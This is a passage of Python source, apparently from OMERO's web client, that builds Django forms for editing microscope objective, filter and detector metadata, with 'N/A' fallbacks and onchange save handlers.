                required=False,
            )
            set_widget_attrs(self.fields["lotNumber"])
        # Nominal Magnification
        try:
            if kwargs["initial"]["objective"].nominalMagnification is not None:
                self.fields["nominalMagnification"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["objective"].id,
                                "nominalMagnification",
                            ),
                        }
                    ),
                    initial=kwargs["initial"]["objective"].nominalMagnification,
                    label="Nominal magnification",
                    required=False,
                )
            else:
                self.fields["nominalMagnification"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["objective"].id,
                                "nominalMagnification",
                            ),
                        }
                    ),
                    label="Nominal magnification",
                    required=False,
                )
                set_widget_attrs(self.fields["nominalMagnification"])
        except Exception:
            self.fields["nominalMagnification"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Nominal magnification",
                required=False,
            )
            set_widget_attrs(self.fields["nominalMagnification"])
        # Calibrated Magnification
        try:
            if kwargs["initial"]["objective"].calibratedMagnification is not None:
                self.fields["calibratedMagnification"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["objective"].id,
                                "calibratedMagnification",
                            ),
                        }
                    ),
                    initial=kwargs["initial"]["objective"].calibratedMagnification,
                    label="Calibrated magnification",
                    required=False,
                )
            else:
                self.fields["calibratedMagnification"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["objective"].id,
                                "calibratedMagnification",
                            ),
                        }
                    ),
                    label="Calibrated magnification",
                    required=False,
                )
                set_widget_attrs(self.fields["calibratedMagnification"])
        except Exception:
            self.fields["calibratedMagnification"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Calibrated magnification",
                required=False,
            )
            set_widget_attrs(self.fields["calibratedMagnification"])
        # Lens NA
        try:
            if kwargs["initial"]["objective"].lensNA is not None:
                self.fields["lensNA"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["objective"].id, "lensNA"
                            ),
                        }
                    ),
                    initial=kwargs["initial"]["objective"].lensNA,
                    label="Lens NA",
                    required=False,
                )
            else:
                self.fields["lensNA"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["objective"].id, "lensNA"
                            ),
                        }
                    ),
                    required=False,
                )
                set_widget_attrs(self.fields["lensNA"])
        except Exception:
            self.fields["lensNA"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Lens NA",
                required=False,
            )
            set_widget_attrs(self.fields["lensNA"])
        # Immersion
        try:
            if kwargs["initial"]["objective"].getImmersion() is not None:
                self.fields["immersion"] = MetadataModelChoiceField(
                    queryset=kwargs["initial"]["immersions"],
                    empty_label="Not set",
                    widget=forms.Select(
                        attrs={
                            "onchange": save_metadata(
                                kwargs["initial"]["objective"].id,
                                "immersion",
                                options=True,
                            )
                        }
                    ),
                    initial=kwargs["initial"]["objective"].getImmersion().value,
                    required=False,
                )
            else:
                self.fields["immersion"] = MetadataModelChoiceField(
                    queryset=kwargs["initial"]["immersions"],
                    empty_label="Not set",
                    widget=forms.Select(
                        attrs={
                            "onchange": save_metadata(
                                kwargs["initial"]["objective"].id,
                                "immersion",
                                options=True,
                            )
                        }
                    ),
                    required=False,
                )
                set_widget_attrs(self.fields["immersion"])
        except Exception:
            self.fields["immersion"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            set_widget_attrs(self.fields["immersion"])
        # Correction
        try:
            if kwargs["initial"]["objective"].getCorrection() is not None:
                self.fields["correction"] = MetadataModelChoiceField(
                    queryset=kwargs["initial"]["corrections"],
                    empty_label="Not set",
                    widget=forms.Select(
                        attrs={
                            "onchange": save_metadata(
                                kwargs["initial"]["objective"].id,
                                "correction",
                                options=True,
                            )
                        }
                    ),
                    initial=kwargs["initial"]["objective"].getCorrection().value,
                    required=False,
                )
            else:
                self.fields["correction"] = MetadataModelChoiceField(
                    queryset=kwargs["initial"]["corrections"],
                    empty_label="Not set",
                    widget=forms.Select(
                        attrs={
                            "onchange": save_metadata(
                                kwargs["initial"]["objective"].id,
                                "correction",
                                options=True,
                            )
                        }
                    ),
                    required=False,
                )
                set_widget_attrs(self.fields["correction"])
        except Exception:
            self.fields["correction"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            set_widget_attrs(self.fields["correction"])
        # Working Distance
        try:
            if kwargs["initial"]["objective"].workingDistance is not None:
                self.fields["workingDistance"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["objective"].id, "workingDistance"
                            ),
                        }
                    ),
                    initial=kwargs["initial"]["objective"].workingDistance.getValue(),
                    # Unit symbol comes from the units-aware value object.
                    label=(
                        "Working distance (%s)"
                        % kwargs["initial"]["objective"].workingDistance.getSymbol()
                    ),
                    required=False,
                )
            else:
                self.fields["workingDistance"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["objective"].id, "workingDistance"
                            ),
                        }
                    ),
                    label="Working distance",
                    required=False,
                )
                set_widget_attrs(self.fields["workingDistance"])
        except Exception:
            self.fields["workingDistance"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Working distance",
                required=False,
            )
            set_widget_attrs(self.fields["workingDistance"])
        # Iris
        try:
            if kwargs["initial"]["objective"].getIris() is not None:
                self.fields["iris"] = forms.ChoiceField(
                    choices=self.BOOLEAN_CHOICES,
                    widget=forms.Select(
                        attrs={
                            "onchange": save_metadata(
                                kwargs["initial"]["objective"].id, "iris", options=True
                            )
                        }
                    ),
                    initial=kwargs["initial"]["objective"].getIris().value,
                    required=False,
                )
            else:
                self.fields["iris"] = forms.ChoiceField(
                    choices=self.BOOLEAN_CHOICES,
                    widget=forms.Select(
                        attrs={
                            "onchange": save_metadata(
                                kwargs["initial"]["objective"].id, "iris", options=True
                            )
                        }
                    ),
                    required=False,
                )
                set_widget_attrs(self.fields["iris"])
        except Exception:
            self.fields["iris"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            set_widget_attrs(self.fields["iris"])
        # Fixed display order for the rendered form.
        self.fields.keyOrder = [
            "model",
            "manufacturer",
            "serialNumber",
            "lotNumber",
            "nominalMagnification",
            "calibratedMagnification",
            "lensNA",
            "immersion",
            "correction",
            "workingDistance",
            "iris",
        ]
class MetadataObjectiveSettingsForm(MetadataObjectiveForm):
    """Objective form extended with the per-image ObjectiveSettings.

    Inherits all objective fields from MetadataObjectiveForm and adds
    correctionCollar, medium and refractiveIndex, using the same
    try / else / except-"N/A" fallback pattern. Also supplies the
    BOOLEAN_CHOICES that the parent's iris field references.
    """

    # Choices for the tri-state iris select (unset / True / False).
    BOOLEAN_CHOICES = (
        ("", "---------"),
        ("True", "True"),
        ("False", "False"),
    )

    def __init__(self, *args, **kwargs):
        super(MetadataObjectiveSettingsForm, self).__init__(*args, **kwargs)
        # Objective Settings
        # Correction Collar
        try:
            if kwargs["initial"]["objectiveSettings"].correctionCollar is not None:
                self.fields["correctionCollar"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["objectiveSettings"].id,
                                "correctionCollar",
                            ),
                        }
                    ),
                    initial=kwargs["initial"]["objectiveSettings"].correctionCollar,
                    label="Correction collar",
                    required=False,
                )
            else:
                self.fields["correctionCollar"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["objectiveSettings"].id,
                                "correctionCollar",
                            ),
                        }
                    ),
                    label="Correction collar",
                    required=False,
                )
                set_widget_attrs(self.fields["correctionCollar"])
        except Exception:
            self.fields["correctionCollar"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Correction collar",
                required=False,
            )
            set_widget_attrs(self.fields["correctionCollar"])
        # Medium
        try:
            if kwargs["initial"]["objectiveSettings"].getMedium() is not None:
                self.fields["medium"] = MetadataModelChoiceField(
                    queryset=kwargs["initial"]["mediums"],
                    empty_label="Not set",
                    widget=forms.Select(
                        attrs={
                            "onchange": save_metadata(
                                kwargs["initial"]["objectiveSettings"].id,
                                "medium",
                                options=True,
                            )
                        }
                    ),
                    initial=kwargs["initial"]["objectiveSettings"].getMedium().value,
                    required=False,
                )
            else:
                self.fields["medium"] = MetadataModelChoiceField(
                    queryset=kwargs["initial"]["mediums"],
                    empty_label="Not set",
                    widget=forms.Select(
                        attrs={
                            "onchange": save_metadata(
                                kwargs["initial"]["objectiveSettings"].id,
                                "medium",
                                options=True,
                            )
                        }
                    ),
                    required=False,
                )
                set_widget_attrs(self.fields["medium"])
        except Exception:
            self.fields["medium"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            set_widget_attrs(self.fields["medium"])
        # Refractive Index
        try:
            if kwargs["initial"]["objectiveSettings"].refractiveIndex is not None:
                self.fields["refractiveIndex"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["objectiveSettings"].id,
                                "refractiveIndex",
                            ),
                        }
                    ),
                    initial=kwargs["initial"]["objectiveSettings"].refractiveIndex,
                    label="Refractive index",
                    required=False,
                )
            else:
                self.fields["refractiveIndex"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["objectiveSettings"].id,
                                "refractiveIndex",
                            ),
                        }
                    ),
                    label="Refractive index",
                    required=False,
                )
                set_widget_attrs(self.fields["refractiveIndex"])
        except Exception:
            self.fields["refractiveIndex"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Refractive index",
                required=False,
            )
            set_widget_attrs(self.fields["refractiveIndex"])
        # Fixed display order: inherited objective fields first, then the
        # settings fields added by this subclass.
        self.fields.keyOrder = [
            "model",
            "manufacturer",
            "serialNumber",
            "lotNumber",
            "nominalMagnification",
            "calibratedMagnification",
            "lensNA",
            "immersion",
            "correction",
            "workingDistance",
            "iris",
            "correctionCollar",
            "medium",
            "refractiveIndex",
        ]
class MetadataFilterForm(forms.Form):
    """Read/edit form for Filter metadata.

    Builds one field per Filter attribute from ``kwargs["initial"]["filter"]``
    (an OMERO Filter wrapper). Each field follows the same pattern used
    throughout this module:

    * if the attribute is set, an editable field pre-filled with its value;
    * if unset, an empty editable field;
    * if reading the attribute raises, a read-only "N/A" placeholder.

    Editable fields carry an ``onchange`` handler (via ``save_metadata``)
    that saves the new value against the Filter's id under the given key.
    ``kwargs["initial"]["types"]`` supplies the FilterType enumeration
    queryset for the ``type`` select.
    """

    def __init__(self, *args, **kwargs):
        super(MetadataFilterForm, self).__init__(*args, **kwargs)

        # Filter
        # Manufacturer
        try:
            if kwargs["initial"]["filter"].manufacturer is not None:
                self.fields["manufacturer"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["filter"].id, "manufacturer"
                            ),
                        }
                    ),
                    initial=kwargs["initial"]["filter"].manufacturer,
                    required=False,
                )
            else:
                self.fields["manufacturer"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["filter"].id, "manufacturer"
                            ),
                        }
                    ),
                    required=False,
                )
            set_widget_attrs(self.fields["manufacturer"])
        except Exception:
            self.fields["manufacturer"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            set_widget_attrs(self.fields["manufacturer"])
        # Model
        try:
            if kwargs["initial"]["filter"].model is not None:
                self.fields["model"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["filter"].id, "model"
                            ),
                        }
                    ),
                    initial=kwargs["initial"]["filter"].model,
                    required=False,
                )
            else:
                self.fields["model"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["filter"].id, "model"
                            ),
                        }
                    ),
                    required=False,
                )
            set_widget_attrs(self.fields["model"])
        except Exception:
            self.fields["model"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            set_widget_attrs(self.fields["model"])
        # Serial Number
        try:
            if kwargs["initial"]["filter"].serialNumber is not None:
                self.fields["serialNumber"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["filter"].id, "serialNumber"
                            ),
                        }
                    ),
                    initial=kwargs["initial"]["filter"].serialNumber,
                    label="Serial number",
                    required=False,
                )
            else:
                self.fields["serialNumber"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["filter"].id, "serialNumber"
                            ),
                        }
                    ),
                    label="Serial number",
                    required=False,
                )
            set_widget_attrs(self.fields["serialNumber"])
        except Exception:
            self.fields["serialNumber"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Serial number",
                required=False,
            )
            set_widget_attrs(self.fields["serialNumber"])
        # Lot number
        try:
            if kwargs["initial"]["filter"].lotNumber is not None:
                self.fields["lotNumber"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["filter"].id, "lotNumber"
                            ),
                        }
                    ),
                    initial=kwargs["initial"]["filter"].lotNumber,
                    label="Lot number",
                    required=False,
                )
            else:
                self.fields["lotNumber"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["filter"].id, "lotNumber"
                            ),
                        }
                    ),
                    label="Lot number",
                    required=False,
                )
            set_widget_attrs(self.fields["lotNumber"])
        except Exception:
            self.fields["lotNumber"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Lot number",
                required=False,
            )
            set_widget_attrs(self.fields["lotNumber"])
        # Filter wheel
        try:
            if kwargs["initial"]["filter"].filterWheel is not None:
                self.fields["filterWheel"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["filter"].id, "filterWheel"
                            ),
                        }
                    ),
                    initial=kwargs["initial"]["filter"].filterWheel,
                    label="Filter wheel",
                    required=False,
                )
            else:
                self.fields["filterWheel"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["filter"].id, "filterWheel"
                            ),
                        }
                    ),
                    label="Filter wheel",
                    required=False,
                )
            set_widget_attrs(self.fields["filterWheel"])
        except Exception:
            self.fields["filterWheel"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Filter wheel",
                required=False,
            )
            set_widget_attrs(self.fields["filterWheel"])
        # Type (FilterType enumeration select)
        try:
            if kwargs["initial"]["filter"].getFilterType() is not None:
                self.fields["type"] = MetadataModelChoiceField(
                    queryset=kwargs["initial"]["types"],
                    empty_label="Not set",
                    widget=forms.Select(
                        attrs={
                            "onchange": save_metadata(
                                kwargs["initial"]["filter"].id, "type", options=True
                            )
                        }
                    ),
                    initial=kwargs["initial"]["filter"].getFilterType().value,
                    required=False,
                )
            else:
                self.fields["type"] = MetadataModelChoiceField(
                    queryset=kwargs["initial"]["types"],
                    empty_label="Not set",
                    widget=forms.Select(
                        attrs={
                            "onchange": save_metadata(
                                kwargs["initial"]["filter"].id, "type", options=True
                            )
                        }
                    ),
                    required=False,
                )
            set_widget_attrs(self.fields["type"])
        except Exception:
            self.fields["type"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            set_widget_attrs(self.fields["type"])
        # Cut in
        tr = kwargs["initial"]["filter"].getTransmittanceRange()
        try:
            if tr is not None and tr.cutIn is not None:
                self.fields["cutIn"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["filter"].id, "cutIn"
                            ),
                        }
                    ),
                    initial=kwargs["initial"]["filter"]
                    .getTransmittanceRange()
                    .cutIn.getValue(),
                    label="Cut in (%s)" % tr.cutIn.getSymbol(),
                    required=False,
                )
            else:
                self.fields["cutIn"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["filter"].id, "cutIn"
                            ),
                        }
                    ),
                    label="Cut in",
                    required=False,
                )
            set_widget_attrs(self.fields["cutIn"])
        except Exception:
            self.fields["cutIn"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Cut in",
                required=False,
            )
            set_widget_attrs(self.fields["cutIn"])
        # Cut out
        try:
            if tr is not None and tr.cutOut is not None:
                self.fields["cutOut"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["filter"].id, "cutOut"
                            ),
                        }
                    ),
                    initial=tr.cutOut.getValue(),
                    label="Cut out (%s)" % tr.cutOut.getSymbol(),
                    required=False,
                )
            else:
                self.fields["cutOut"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["filter"].id, "cutOut"
                            ),
                        }
                    ),
                    label="Cut out",
                    required=False,
                )
            set_widget_attrs(self.fields["cutOut"])
        except Exception:
            self.fields["cutOut"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Cut out",
                required=False,
            )
            set_widget_attrs(self.fields["cutOut"])
        # Cut in tolerance
        try:
            if tr is not None and tr.cutInTolerance is not None:
                self.fields["cutInTolerance"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["filter"].id, "cutInTolerance"
                            ),
                        }
                    ),
                    initial=tr.cutInTolerance.getValue(),
                    label=("Cut in tolerance (%s)" % tr.cutInTolerance.getSymbol()),
                    required=False,
                )
            else:
                self.fields["cutInTolerance"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["filter"].id, "cutInTolerance"
                            ),
                        }
                    ),
                    label="Cut in tolerance",
                    required=False,
                )
            set_widget_attrs(self.fields["cutInTolerance"])
        except Exception:
            self.fields["cutInTolerance"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Cut in tolerance",
                required=False,
            )
            set_widget_attrs(self.fields["cutInTolerance"])
        # Cut out tolerance
        try:
            if tr is not None and tr.cutOutTolerance is not None:
                self.fields["cutOutTolerance"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            # Fixed copy-paste bug: previously saved under
                            # "cutOut", silently overwriting the cut-out value
                            # instead of the tolerance (cf. cutInTolerance).
                            "onchange": save_metadata(
                                kwargs["initial"]["filter"].id, "cutOutTolerance"
                            ),
                        }
                    ),
                    initial=tr.cutOutTolerance.getValue(),
                    label=("Cut out tolerance (%s)" % tr.cutOutTolerance.getSymbol()),
                    required=False,
                )
            else:
                self.fields["cutOutTolerance"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["filter"].id, "cutOutTolerance"
                            ),
                        }
                    ),
                    label="Cut out tolerance",
                    required=False,
                )
            set_widget_attrs(self.fields["cutOutTolerance"])
        except Exception:
            self.fields["cutOutTolerance"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Cut out tolerance",
                required=False,
            )
            set_widget_attrs(self.fields["cutOutTolerance"])
        # Transmittance (stored as a fraction; displayed as a percentage)
        try:
            if kwargs["initial"]["filter"].transmittanceRange is not None:
                self.fields["transmittance"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["filter"].id, "transmittance"
                            ),
                        }
                    ),
                    initial=formatPercentFraction(
                        kwargs["initial"]["filter"]
                        .getTransmittanceRange()
                        .transmittance
                    ),
                    label="Transmittance (%)",
                    required=False,
                )
            else:
                self.fields["transmittance"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["filter"].id, "transmittance"
                            ),
                        }
                    ),
                    required=False,
                )
            set_widget_attrs(self.fields["transmittance"])
        except Exception:
            self.fields["transmittance"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            set_widget_attrs(self.fields["transmittance"])

        # Fix the display order of the fields (legacy Django keyOrder).
        self.fields.keyOrder = [
            "model",
            "manufacturer",
            "serialNumber",
            "lotNumber",
            "type",
            "filterWheel",
            "cutIn",
            "cutOut",
            "cutInTolerance",
            "cutOutTolerance",
            "transmittance",
        ]
class MetadataDetectorForm(forms.Form):
    """Read/edit form for Detector / DetectorSettings metadata.

    Built from ``kwargs["initial"]["detector"]`` (the Detector wrapper) and
    ``kwargs["initial"]["detectorSettings"]`` (per-channel settings, may be
    ``None``). Settings values take precedence over detector values where
    both exist (gain, voltage, offset). Each field follows the module-wide
    pattern: editable with an ``onchange`` save handler when readable,
    read-only "N/A" fallback when reading raises.
    ``kwargs["initial"]["types"]`` and ``kwargs["initial"]["binnings"]``
    supply the enumeration querysets for the two selects.
    """

    def __init__(self, *args, **kwargs):
        super(MetadataDetectorForm, self).__init__(*args, **kwargs)
        detSet = kwargs["initial"]["detectorSettings"]
        detector = kwargs["initial"]["detector"]

        # Manufacturer
        try:
            if detector is not None:
                self.fields["manufacturer"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(detector.id, "manufacturer"),
                        }
                    ),
                    initial=detector.manufacturer,
                    required=False,
                )
            else:
                # NOTE(review): detector is None here, so detector.id raises
                # AttributeError and the except branch below builds the field
                # instead. Kept as-is to preserve behavior.
                self.fields["manufacturer"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(detector.id, "manufacturer"),
                        }
                    ),
                    required=False,
                )
            set_widget_attrs(self.fields["manufacturer"])
        except Exception:
            self.fields["manufacturer"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            set_widget_attrs(self.fields["manufacturer"])
        # Model
        try:
            if detector is not None:
                self.fields["model"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(detector.id, "model"),
                        }
                    ),
                    initial=detector.model,
                    required=False,
                )
            else:
                self.fields["model"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(detector.id, "model"),
                        }
                    ),
                    required=False,
                )
            set_widget_attrs(self.fields["model"])
        except Exception:
            self.fields["model"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            set_widget_attrs(self.fields["model"])
        # SN
        try:
            if detector is not None:
                self.fields["serialNumber"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(detector.id, "serialNumber"),
                        }
                    ),
                    initial=detector.serialNumber,
                    required=False,
                )
            else:
                self.fields["serialNumber"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(detector.id, "serialNumber"),
                        }
                    ),
                    required=False,
                )
            set_widget_attrs(self.fields["serialNumber"])
        except Exception:
            self.fields["serialNumber"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            set_widget_attrs(self.fields["serialNumber"])
        # Lot number (NB. Untill OMERO model is updated in 4.3, this will
        # throw since lotNumber is not yet supported)
        try:
            if detector is not None:
                self.fields["lotNumber"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(detector.id, "lotNumber"),
                        }
                    ),
                    initial=detector.lotNumber,
                    required=False,
                )
            else:
                self.fields["lotNumber"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(detector.id, "lotNumber"),
                        }
                    ),
                    required=False,
                )
            set_widget_attrs(self.fields["lotNumber"])
        except Exception:
            self.fields["lotNumber"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            set_widget_attrs(self.fields["lotNumber"])
        # Type (DetectorType enumeration select)
        try:
            if detector.getDetectorType() is not None:
                self.fields["type"] = MetadataModelChoiceField(
                    queryset=kwargs["initial"]["types"],
                    empty_label="Not set",
                    widget=forms.Select(
                        attrs={
                            "onchange": save_metadata(detector.id, "type", options=True)
                        }
                    ),
                    initial=detector.getDetectorType().value,
                    required=False,
                )
            else:
                self.fields["type"] = MetadataModelChoiceField(
                    queryset=kwargs["initial"]["types"],
                    empty_label="Not set",
                    widget=forms.Select(
                        attrs={
                            "onchange": save_metadata(detector.id, "type", options=True)
                        }
                    ),
                    required=False,
                )
            set_widget_attrs(self.fields["type"])
        except Exception:
            self.fields["type"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            set_widget_attrs(self.fields["type"])
        # Gain: settings value preferred, then detector value.
        try:
            if detSet is not None:
                self.fields["gain"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={"size": 25, "onchange": save_metadata(detSet.id, "gain")}
                    ),
                    initial=detSet.gain,
                    required=False,
                )
            elif detector is not None:
                self.fields["gain"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(detector.id, "gain"),
                        }
                    ),
                    initial=detector.gain,
                    required=False,
                )
            else:
                # NOTE(review): detSet is None here, so this always raises
                # into the except branch. Kept to preserve behavior.
                self.fields["gain"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={"size": 25, "onchange": save_metadata(detSet.id, "gain")}
                    ),
                    required=False,
                )
            set_widget_attrs(self.fields["gain"])
        except Exception:
            self.fields["gain"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            set_widget_attrs(self.fields["gain"])
        # Voltage: settings value preferred, then detector value.
        try:
            if detSet is not None and detSet.voltage is not None:
                self.fields["voltage"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(detSet.id, "voltage"),
                        }
                    ),
                    initial=detSet.voltage.getValue(),
                    label="Voltage (%s)" % detSet.voltage.getSymbol(),
                    required=False,
                )
            elif detector is not None:
                self.fields["voltage"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(detector.id, "voltage"),
                        }
                    ),
                    initial=detector.voltage.getValue(),
                    label="Voltage (%s)" % detector.voltage.getSymbol(),
                    required=False,
                )
            else:
                self.fields["voltage"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(detSet.id, "voltage"),
                        }
                    ),
                    required=False,
                )
            set_widget_attrs(self.fields["voltage"])
        except Exception:
            self.fields["voltage"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            set_widget_attrs(self.fields["voltage"])
        # Offset: settings value preferred, then detector value.
        try:
            if detSet is not None:
                self.fields["offsetValue"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(detSet.id, "offsetValue"),
                        }
                    ),
                    initial=detSet.offsetValue,
                    label="Offset",
                    required=False,
                )
            elif detector is not None:
